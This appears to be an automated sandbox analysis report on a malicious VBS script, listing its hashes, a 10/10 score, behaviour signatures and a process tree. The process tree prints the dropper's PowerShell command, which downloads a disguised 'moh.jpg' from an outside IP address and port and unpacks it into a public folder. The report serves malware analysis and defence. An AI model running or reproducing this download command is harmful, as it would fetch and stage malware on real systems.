Analysis
-
max time kernel
118s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
04-01-2024 16:11
Static task
static1
Behavioral task
behavioral1
Sample
05012024_0011_g4.vbs
Resource
win7-20231215-en
windows7-x64
4 signatures
150 seconds
General
-
Target
05012024_0011_g4.vbs
-
Size
731B
-
MD5
b0f5cedd7db682ffda4ce4968eac926d
-
SHA1
3200790fa2df151aace6a3454e167de2b89fad6e
-
SHA256
cc810f437d25ad3ba039f7007f3e7b96826d1d96d470a7f3371ddd17ac888f28
-
SHA512
7fe0f16adeb11eccd10955114451356b68a8dd61c79d606aeb435ecdacd87e5dfc0c6dfefe47bd234cb398a2158440001829ef772226323616fb5a8b2c5d72c3
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
http://104.243.44.136:666/moh.jpg
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2656 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2656 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 3056 wrote to memory of 2656 3056 WScript.exe 28 PID 3056 wrote to memory of 2656 3056 WScript.exe 28 PID 3056 wrote to memory of 2656 3056 WScript.exe 28
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\05012024_0011_g4.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:3056 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://104.243.44.136:666/moh.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2656
-